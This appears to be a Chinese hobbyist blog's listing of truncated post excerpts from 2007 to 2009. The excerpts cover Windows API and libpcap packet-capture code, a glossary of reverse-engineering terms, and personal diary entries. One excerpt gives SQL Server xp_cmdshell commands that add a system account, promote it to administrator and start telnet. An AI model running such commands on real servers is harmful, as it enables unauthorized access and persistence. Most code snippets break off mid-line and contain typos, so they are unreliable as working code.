2009-03-30 13:42 //Get NT header
res = ReadProcessMemory(
hProcess,
(VOID*)((DwORD)hModuleBase +
(DWORD)Doshdr.e_lfanew),
|
2009-02-24 10:39 利用“vmaster.dbo.xp_cmdshell”扩展存储过程中,可以执行的任意命令;
添加系统账户
exec master..xp_cmdshell'' net user codingchen chengxubug /add''
提升为管理员
;exec master..xp_cmdshell"net localgroup administrators chengxubug /add"
开启 telnet服务
;exec mater..xp_servicecontrol"net start /add
|
2009-02-07 15:09 A类
Additional 额外的,附加的
Access 访问
Active 激活
Address 地址
Alignment 对齐
Algorithm 算法
Against 反抗,对抗的
Attach 附加,调试器通过附加来调试正在运行的程序
Attack 反击
AntiCrack 反破解
Anti Debug 反调试,一种反程序分析的手段,一般通过加花指令或加增加强壳
Anti trace 反跟踪
Anti dump 反转储,反脱壳
Analysis 分析
Anti Patch 反补丁
Anti Loader 反加载 |
2008-07-12 18:13 1 createdialog函数
HWND CreateDialog(
HINSTANCE hInstance,
LPCTSTR lptemplate,
HWND hWndParent,
DLGPROC lpdialogFunc
2 CreateDialogParam函数
HWND CreateDialogParam(
LPCTSTR lpTemplateName,
HWND |
2007-12-20 15:39 #include <pcap.h >
/*Libpcap头文件*/
struct ether_header
{
u_int8_t ether_dhost[6];
u_int8_t ether_shost[6];
u_int16_t ether_type;
};
void main()
{
char error_content [pcap_ERRBUF_SIZE];
pcap_t* pcap_handle;
const u_char *packet_content;
u_char *mac_string;
u_short ethernet _type;
bpf _u_int32 net _mask;
bpf_u_int 32 net _ip;
char *net _interface;
struct |
2007-12-20 14:35 # include <pcap.h >
void packet_callback (u_char * argument ,const struct pacp_pkthdr* packet_header,const u_char* packet_content)
{
static int packet _number = 1;
printf("The %d packet is capturred.\n",packet_number);/*输出捕获数据包的个数*/
packet_number++;
}
void main()
{
pcap_T * pcap_handle;
char error _conternt[pcap_ERRBUF_SIZE];
char *net_interface;
struct bpf_program bpf_filter;
|
2007-12-20 14:14 get _a_packet_code.c
include <pcap.h>
int main()
{
char error_content[pcap _ERRBUF_SIZE];
struct pcap_pkthdr protocol_header;
pcap_t *pcap_handle;
struct bpf_program bpf_filter;
char bpf_filter_string[] = "";
const u_char *packet_content;
bpf_u_int32 net _mask;
bpf_u_int32 net_ip;
char *net_interface;
net _interface =pcap_lookupdev(error_content); /*获取网络接口*/
pcap _loo |
2007-12-11 18:01 12月11日,持续了几天的大雾天气,好在还不是太冷,只是能见度有点低,说来丢人.到现在自己还不会开车,每次出去玩只有坐车的命.下定决心,明年得把驾驶执照弄到手里.哎,转眼一年很快又要过去了,过完圣诞这个洋玩意的节日,再过下元旦.
北风那个吹,雪花那个飘,雪花飘飘,年来到!貌似这是白毛女的主题曲.不过这可是今天天气的真实写照.
等了几天的雪花,终于洋洋洒洒的一片片飘落下来,前提条件得开着车灯才能看到/它和雨水姐姐一起来到了人间.
不说了,瑞雪兆丰年,相信2008年能给我带来更多的商机,祝福自己在事业上能 |
2007-10-19 1:23 最近跟几个朋友在学delphi,delphi真可算是最简单的vb,聪明的程序员都会选择它
procedure TForm1.ItemAutoWarp1Click(Sender :TObject);
begin
RichEdit1.WordWrap:=not RichEdit1.WordWrap;
ItemAutoWarp1.Checked:=RichEdit1.WordWrap;
end;
自动换行功能代码
|
2007-09-30 10:47 今天在家整理资料,翻出来好多老的古董工具,一个hscan,让我想起了当年三组合在一起做事的日子,哎,由于自己的疏忽和放松警惕而被人钻了空子,也葬送了三组合,不过这个事情之后让我更好的成长起来,这个社会就是如此的现实,过多的依靠别人,依赖别人是不成的.别人的东西再好,都不如自己掌握了,学到手里面更实际,天下没有不散的宴席,过早的结束,更是新的开始! |
| | |